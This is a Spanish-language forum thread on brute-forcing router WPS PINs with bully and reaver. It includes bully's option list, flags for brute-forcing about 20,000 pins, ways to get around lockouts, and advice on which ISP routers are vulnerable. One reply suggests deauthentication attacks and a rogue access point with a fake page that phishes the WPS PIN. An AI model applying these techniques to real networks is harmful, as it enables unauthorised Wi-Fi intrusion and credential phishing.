Hasta ahora, los Amper de Telefonica , se han empezado a saltar el estandar, y crea un pin de 8 números sin realizar checksum, por lo que la contraseña tendrá 20000 posibles pines.

Para atacar estos objetivos, necesitas utilizar bully con la opcion que "hardcodea" el último dígito sin calcular el checksum
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Coeman76 en Diciembre 18, 2013, 16:44:04 pm
@Peluzza

Lo primero,bienvenido al foro ;)

Luego...

El user blasiring se refiere a que no encuentra los 4 primeros dígitos.

No es el primer dispositivo que se ve con estas caracteristicas ni será el último.

No lo tomes a mal,pero permiteme decirte que aunque se agradece tu explicacion,estas confundiendo un poco a quien pregunta,puesto que para los 4 primeros digitos no hay regla checksum que valga ;)

Un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: peluzza en Diciembre 18, 2013, 18:00:31 pm
@Coeman76:
Lo primero, gracias por la bienvenida, más de uno me conoce de otros foros  ;D
Oh! cierto!!!
me he columpiado! efectivamente confundí este caso con los Amper! mil perdones.

Aun así sería bueno que probrara con bully para ver la salida del programa que dice, desde luego a mi me deja un poco perplejo.
¿Es posible saber el PIN del router? es decir ¿Es tuyo el router o es "trabajo de campo"?, estaría bien saber el modelo exacto para examinar el firmware.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: blasiring en Enero 27, 2014, 22:16:55 pm

Hasta ahora, los Amper de Telefonica , se han empezado a saltar el estandar, y crea un pin de 8 números sin realizar checksum, por lo que la contraseña tendrá 20000 posibles pines.

Para atacar estos objetivos, necesitas utilizar bully con la opcion que "hardcodea" el último dígito sin calcular el checksum

Hola peluzza,pues te agradeceria que me dijeses qué deberia hacer para probar los 20000 pines como dices con bully en wifislax 4.7.2
No se como se hace,gracias.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Coeman76 en Enero 27, 2014, 22:26:42 pm
Pues imagino que si abres una consola y escribes

Código: [Seleccionar]
bully

en xubuntu pasa esto ;) en wifislax pasará igual :P....es la chuleta con todo lo que puedes hacer con bully...entre las opciones está la que buscas ;)

Código: [Seleccionar]
coe@Administrador:~$ bully

  usage: bully <options> interface

  Required arguments:

      interface      : Wireless interface in monitor mode (root required)

      -b, --bssid macaddr    : MAC address of the target access point
   Or
      -e, --essid string     : Extended SSID for the access point

  Optional arguments:

      -c, --channel N[,N...] : Channel number of AP, or list to hop [b/g]
      -i, --index N          : Starting pin index (7 or 8 digits)  [Auto]
      -l, --lockwait N       : Seconds to wait if the AP locks WPS   [43]
      -o, --outfile file     : Output file for messages          [stdout]
      -p, --pin N            : Starting pin number (7 or 8 digits) [Auto]
      -s, --source macaddr   : Source (hardware) MAC address      [Probe]
      -v, --verbosity N      : Verbosity level 1-3, 1 is quietest     [3]
      -w, --workdir path     : Location of pin/session files  [~/.bully/]
      -5, --5ghz             : Hop on 5GHz a/n default channel list  [No]
      -B, --bruteforce       : Bruteforce the WPS pin checksum digit [No]
      -F, --force            : Force continue in spite of warnings   [No]
      -S, --sequential       : Sequential pins (do not randomize)    [No]
      -T, --test             : Test mode (do not inject any packets) [No]

  Advanced arguments:

      -a, --acktime N        : Deprecated/ignored                  [Auto]
      -r, --retries N        : Resend packets N times when not acked  [2]
      -m, --m13time N        : Deprecated/ignored                  [Auto]
      -t, --timeout N        : Deprecated/ignored                  [Auto]
      -1, --pin1delay M,N    : Delay M seconds every Nth nack at M5 [0,1]
      -2, --pin2delay M,N    : Delay M seconds every Nth nack at M7 [5,1]
      -A, --noacks           : Disable ACK check for sent packets    [No]
      -C, --nocheck          : Skip CRC/FCS validation (performance) [No]
      -D, --detectlock       : Detect WPS lockouts unreported by AP  [No]
      -E, --eapfail          : EAP Failure terminate every exchange  [No]
      -L, --lockignore       : Ignore WPS locks reported by the AP   [No]
      -M, --m57nack          : M5/M7 timeouts treated as WSC_NACK's  [No]
      -N, --nofcs            : Packets don't contain the FCS field [Auto]
      -P, --probe            : Use probe request for nonbeaconing AP [No]
      -R, --radiotap         : Assume radiotap headers are present [Auto]
      -W, --windows7         : Masquerade as a Windows 7 registrar   [No]
      -Z, --suppress         : Suppress packet throttling algorithm  [No]
      -V, --version          : Print version info and exit
      -h, --help             : Display this help information

No monitor mode interface specified
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: blasiring en Enero 27, 2014, 22:39:13 pm
Gracias por responder.
Yo de comandos lo justo  :'(
No sé cual seria para probar la opcion de 20000 pines,si es que existe y se puede,yo hablo porque el usuario peluzza dice no se que de un "hardcodeo" y eso no lo habia oido,voy medio perdido... :-[
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 27, 2014, 22:55:08 pm
Código: [Seleccionar]
-S, --sequential       : Sequential pins (do not randomize)    [No]
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: blasiring en Enero 30, 2014, 01:06:06 am
Código: [Seleccionar]
-S, --sequential       : Sequential pins (do not randomize)    [No]

Gracias kcdtv.
Entonces como quedaria el comando?  ::)
Otra cosa,esto haria que diese el pin o por el contrario los probaria todos de forma secuencial y el resultado seguiria siendo el mismo?
Gracias.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 30, 2014, 01:28:08 am
Tienes que probar, no lo se ... no uso bully  :P
supongo "-S pin de incio - pin final"
Sino WPSPIN 1.5 te permite hacerlo con reaver, eliges tu objetivo y antes de atacar  le das a definir secuencia y entras tu secuencia de PIN

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Coeman76 en Enero 30, 2014, 02:37:11 am
kc creo que blasiring se refería a pasar el segundo bloque sin suma checksum...

El comando -S se utiliza para no randomizar (que los pines salgan en orden o de forma secuencial)

Creo que lo que blasiring busca es el comando -B

Código: [Seleccionar]
-B, --bruteforce       : Bruteforce the WPS pin checksum digit [No]
Es decir....comprobar todos los posibles pins sumando un total de 20000...pa que nos entendamos,como si fuese un reavermod
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 30, 2014, 02:55:32 am
 :D

vale

a dormir
 :)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: blasiring en Febrero 02, 2014, 22:05:11 pm
kc creo que blasiring se refería a pasar el segundo bloque sin suma checksum...

El comando -S se utiliza para no randomizar (que los pines salgan en orden o de forma secuencial)

Creo que lo que blasiring busca es el comando -B

Código: [Seleccionar]
-B, --bruteforce       : Bruteforce the WPS pin checksum digit [No]
Es decir....comprobar todos los posibles pins sumando un total de 20000...pa que nos entendamos,como si fuese un reavermod

Hola Coeman76,gracias por responder,claro yo lo que quiero es que pruebe los 20000 pines,pero lo que no sé es como quedaria el comando,osea en que lugar iria cada comando,le -B etc...
Gracias.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Febrero 02, 2014, 23:44:46 pm
Puedes poner la -B al final o en penúltima posición si te gusta mas... . 
La cosa es probar y si no lo consigues pedir ayuda, no pedir ayuda antes de empezar para problemas que no tienes  aún  ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: guest48471 en Febrero 03, 2014, 01:09:30 am
buenas yo estoy probando con bully guiado de wifislax 4.8 y ma saltao m7 y sigue lo dejo k siga o cojo los dos primero numero y lo uso con otro programa?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: 1camaron1 en Febrero 03, 2014, 09:00:39 am
Ya que tienes un M7 déjalo continuar... esos dos números siempre puedes memorizarlos para un plan B  ;D
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: wayout en Febrero 23, 2014, 22:07:27 pm
[img width=540 height=420]http://img106.xooimage.com/files/d/2/8/instant1.jpg-441acb1.png[/img]

No comprendo que ponga que la llave este crakeada y luego no salga la key
.¿Alguien me puede a ayudar a comprender y/o decir que he hecho mal? He usado los comandos d10 t12 T2 y n
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: guest48471 en Marzo 08, 2014, 19:34:41 pm
mi red tienes wps activado pero lo intentado varias veces con bully guiado de wifislax 4.8 rc5 y me pone siempre k: exhausted first-half possibilites sucess que significa??? grasias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Marzo 08, 2014, 20:03:27 pm

En el sitio de Brian Purcell / Bully tienes abierta una discusión:

"exhausted first-half..."

..mejor que en el sitio del autor nada.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: joan saenz en Marzo 08, 2014, 21:44:05 pm
Buen dia son nuevo en esto espero me aclaren un duda ya como esta dicho que no hay forma de desbloquear wps  un router  si no de forma manual ,¿ hay un metodo o programa para bloquear ese router para que el usuario lo tenga que reseatar para asi desbloquearlo ya que unos router no se desbloquean tan rapido como otros ejemplo mi router thomson tg582n que lo bloquee y ya lleva 2 meses asi  wps aclarando ?o algun programa como linsen pero para wps para que el usuario lo ponga .
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Marzo 08, 2014, 23:31:23 pm
Citar
hay un metodo o programa para bloquear ese router para que el usuario lo tenga que reseatar
el propio ataque de desautenticación de aireplay-ng ( con -0 0 ) o bien mdk3.
Citar
o algun programa como linsen pero para wps para que el usuario lo ponga
habres el fichero linset y cambias "passphrase WPA" por "PIN WPS" en la parte con el código fuente de la pagina falsa.  ;)
Hay miles de script y programas para hacer rogue AP, encuentra el que te gusta o sino has tu mismo en linea de comandops tu rpgue AP con tu propia pagina falsa
No es complicado, habres un tema a parte si necesitas ayuda  ;)

Marzo 08, 2014, 23:43:57 pm
[img width=540 height=420]http://img106.xooimage.com/files/d/2/8/instant1.jpg-441acb1.png[/img]

No comprendo que ponga que la llave este crakeada y luego no salga la key
.¿Alguien me puede a ayudar a comprender y/o decir que he hecho mal? He usado los comandos d10 t12 T2 y n

parece que ha procesado como beunos un M4 y un M7.... pero sin mandar los  :o

¿Has usado el opción -p?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: wayout en Marzo 09, 2014, 14:07:21 pm

¿Has usado el opción -p?
Si use la opción -p
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Marzo 09, 2014, 16:47:53 pm
con el opción -p aumentas las probabilidades de fallos de este tipo,,,
WPSPIN te permite mandar el o los PIN que quieres primero sin usar el opción -p lo que disminuye muchísimo este tipo de errores y aumenta la eficiencia del ataque.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: someonelsse en Junio 14, 2014, 17:28:07 pm
Hola "Coeman", como novato por éste foro me gustaría saber qual es exactamente el sript para desbloquear el WPS bloqueado y donde precisamente se implementa. Utilzo "Wifilax 4.9" con aranque dirrecto del hdd y se me resista algunas redes..
PS: son 2 redes de ono (wps2), una de Jazztel (wpa) y un Vodafone. Mis umildes gratitudes anticipadamente. Si no pido demasiado sería una explicacción más detallada ya que apena de 2 meses utilizo linux....ya se se que parezco más que un novato pero algún dia  todos empesamos "ALGO" desde cero ....incluso dar por el culo al "uncle Bill" con su puto Windowssssssssssssss !!!!!!!!!!!!!!!!!!!!!!!!! ;D

PS2: aquí os dejo un "copy end paste" de éste tema muy parecido encontrado en el http://www.auditoriaswireless.net/ :

"....Probado con éxito en los routers con ESSID Orange_XXXX (seguramente funcione en otros también)

(http://img594..us/img594/5999/dtpw.jpg)

El modo de uso es bien sencillo:

1- Ejecutar GOYscriptWPS como siempre
2- En el momento que veamos que el AP se ha bloqueado:
  2.1- Abrimos una consola y nos situamos en el directorio donde hemos descargado el script
  2.2- Ejecutamos el script escribiendo:
Código: [Seleccionar]
sh wps_unlocker.sh

Y ya está. Si lo hemos hecho bien el router se desbloqueará y GOYscriptWPS podrá seguir probando PINs.

Espero que lo disfrutéis."
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Junio 14, 2014, 17:30:57 pm

Bonita forma de expresarse maltrando la lengua de Cervantes... sigue así, llegarás a mas.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: someonelsse en Junio 14, 2014, 17:43:08 pm
Bonita forma de expresarse maltrando la lengua de Cervantes... sigue así, llegarás a mas.
   

.............................................................

¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡  Ya estamos con la "Gramática" o los "buenos modales" !!!!!!!!!!!!!!!!!!!!!!!!!!
This world is created for all , is not it?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Junio 14, 2014, 17:49:00 pm
Citar
PS2: aquí os dejo un "copy end paste" de éste tema muy parecido encontrado en el http://www.auditoriaswireless.net/ :
Comienza por leer las normas que es lo 1º que deberías hacer..

Citar
normas (extracto)

A partir de hoy el que haga un copy/paste de contenido de otro sitio quedara automaticamente baneado y cuenta borrada sin previo aviso.

normas

Citar
¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡  Ya estamos con la "Gramática" o los "buenos modales" !!!!!!!!!!!!!!!!!!!!!!!!!!
This world is created for all , is not it?
En lo sucecivo procura expresarte adecuadamente.

Respecto a Wps_Unlock de Goy lee el post y te darás cuenta por ti mismo de para que fue creado.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: someonelsse en Junio 14, 2014, 18:35:22 pm
Comienza por leer las normas que es lo 1º que deberías hacer..

normas
En lo sucecivo procura expresarte adecuadamente.

Respecto a Wps_Unlock de Goy lee el post y te darás cuenta por ti mismo de para que fue creado.

Está bien....no quiero mal rollo con nadie ..he cometido el error de copiar y pegar links de otras webs , sin ller las normas, algo muy "reglementaroi" en mundo lleno de "REGLAs" , de hecho nisiquera he leido las normas y pido onestamente disculpas..nadie es perfecto pero reconocerlo aún ni mucho más... en fin , a lo que voy , a q post te refieres de Wps_Unlock?..
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Junio 14, 2014, 18:49:58 pm

Las reglas son las reglas y deben ser leídas para acatarlas,  no tienen que gustarnos.. en ese caso con volver por donde hemos venido es suficiente.

Bien.  de "buen rollito" pues..

Citar
a q post te refieres de Wps_Unlock?
Observa la imágen que has subido y el post al que haces referencia y verás que es el nombre de la herramienta (wps_unlocker). Lo lees y ya averiguarás por ti mismo porqué te lo digo:

Citar
Respecto a Wps_Unlock de Goy lee el post y te darás cuenta por ti mismo de para que fue creado.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: someonelsse en Junio 14, 2014, 20:22:38 pm
Las reglas son las reglas y deben ser leídas para acatarlas,  no tienen que gustarnos.. en ese caso con volver por donde hemos venido es suficiente.

Bien.  de "buen rollito" pues..
Observa la imágen que has subido y el post al que haces referencia y verás que es el nombre de la herramienta (wps_unlocker). Lo lees y ya averiguarás por ti mismo porqué te lo digo:

He intentado ser amable y pedir disculpas al webmaster ( da igual quien sea )  por quebrantar las reglas de su web , pero nunca me han gustado los IRONICOS Y LOS "A TODO SABIOS"...por que cuanto más sabes más te parece que no sabes nada..en fin....yo simplemente SOLO PASABA DE LARGO (POR NO SER SUFICIENTE), en una web bastante interesante por la paradoja de las Leyes DE LOS TEMAS.... HIHIHIHIHIHI ... y según veo algunos nos creemos "Dioses"...simplemente quiería unas respuestas no otras preguntas a mis preguntas...en fin...lección aprendida....HAGAS LO QUE HAGAS HAZLO SOLO !!!!!!!!!!!!!!!!!!!!!!!!
Por cierto :

          NU TREZI UN PROST FIINDCA O SE TE URASCA !!!!!!!!!!! ( está en rumano...por no traducirlo lo pongo abajo, igual que tu en los post )
¡¡¡¡¡¡¡ NO DESPIERTES NUNCA UN TONTO...TE ODIARÁ !!!!!!!!!!!!!!!!!!!!!!!!!!!
         Do not wake a fool because he will hate you !!!!!!!!!!!!!!!!!!!!
      SEE YOU,...O NOT IF YOU MAKE THIS NOISE !!!!!!!!!!!!!
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Coeman76 en Junio 14, 2014, 20:30:42 pm
@someonelsse

Sin malos rollos

Has probado el script de goyfilms como te recomienda maripuri?

En serio,pruebalo primero y luego comenta,te daras cuenta de porqué fue creado y te echaras unas risas...

Un saludo

P.D.: Tambien hay un programa Jazztel-XXXX con mucho exito creado para el mismo fin que el wps_unlocker de goy xD
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Junio 14, 2014, 21:19:58 pm

"Amos ver", si ni siquiera has probado el script..  vienes y lo posteas sin saber que hace, con un leguaje que NADIE tiene por que aguantar y ya son todo quejas por ni siquiera hacerme caso y leer el post.

Tanto si te gusta como si no FIN de la historia
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: rcoto en Junio 15, 2014, 00:12:56 am
Q buena herramienta creada en el día de los inocentes

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ggekko en Junio 20, 2014, 21:45:59 pm
alguna alma linuxera podria (a grandes rasgos) explicar las diferencias entre Bully, WPSPIN, GOYxxxx  o usar wash/reaver a palo seco para descubrir y atacar los objetivos?
Acabo de toparme con las 'puñeteras' 8C:0C:A3: y uso reavermod; pero sino me asocio con aireplay-ng -1 reavermod no anda...
se que son dos preguntas en una... gracias por este compendio de sabiduria que hay recopilado en el foro.
linuxero aficionado
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: NEXUS978 en Junio 20, 2014, 23:34:13 pm
Para esas en concreto que citas comienza con el reaver normal y cuando vaya por el 80 u 85% guardas sesion y utilizas el reaver modificado expresamente para esas macs.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: landru en Julio 09, 2014, 18:36:13 pm
Hola amigos. Quería saber si hay solución al problema de que reaver se pare al 90,90% probando constantemente el pin 99985677 ya que se trató en su día y os juro que por mas que he leido por todas partes no he sido capaz de resolverlo. Muchas gracias.

Por otro lado tengo un router JAZZTEL_XXXX que se bloquea durante 24 horas al reaver cuando prueba 3 pines seguidos. La opción que le doy es -r 2:61 con lo que no se bloquea pero se hace muy lento ya que prueba 2 pines cada 61 segundos. ¿Habría alguna forma mas rápida de hacerlo? Muchas gracias de nuevo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: blasiring en Noviembre 13, 2014, 15:39:42 pm
Hola de nuevo.
Parece ser que timofónica esta implantando nuevos routers con mac 20:25:64:xx:xx:xx
No se si alguien sabe de algun pin por defecto para estos routers o si alguien más las ha visto,yo veo 2.
No es vulnerable mediande WPS puesto que se bloquea  :-\
Por cierto,jumpstart muestra como device name "b45538" y "b6097a"
A ver si alguien sabe algo más de estos aparatos...
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kikess en Noviembre 13, 2014, 21:46:01 pm
hola ,buenas noches , tengo un colega que trabaja con los de timefomica , y parece ser que estan dando ordenes de ir revisando sus router  motistar xxxx y wlanxxxx
i desactivarle el WPS  ,ya empezaron esta semana  ,los configuran con esa opcion y los que  por defecto  no se desactiva el WPS lo sustituyen  por otro ,,los que tengais contratado con timefomica no asustaros si os tocan el timbre y os  revisan vuestros routers ,,tambien bueno por vuestra seguridad,  saludos.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Noviembre 13, 2014, 23:13:45 pm
Sería mejor si empezarían a cambiar los routeurs que llevan aun WEP por defecto o que so vulnerables a nuestras GUI WLAN_XXXX WPA ( y las de los otros )  :D
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: managuas en Agosto 16, 2016, 14:21:46 pm
alguien sabría decir que macs nuevas de jazztel son vulnerables a reaver o ZAO y pixiescrip?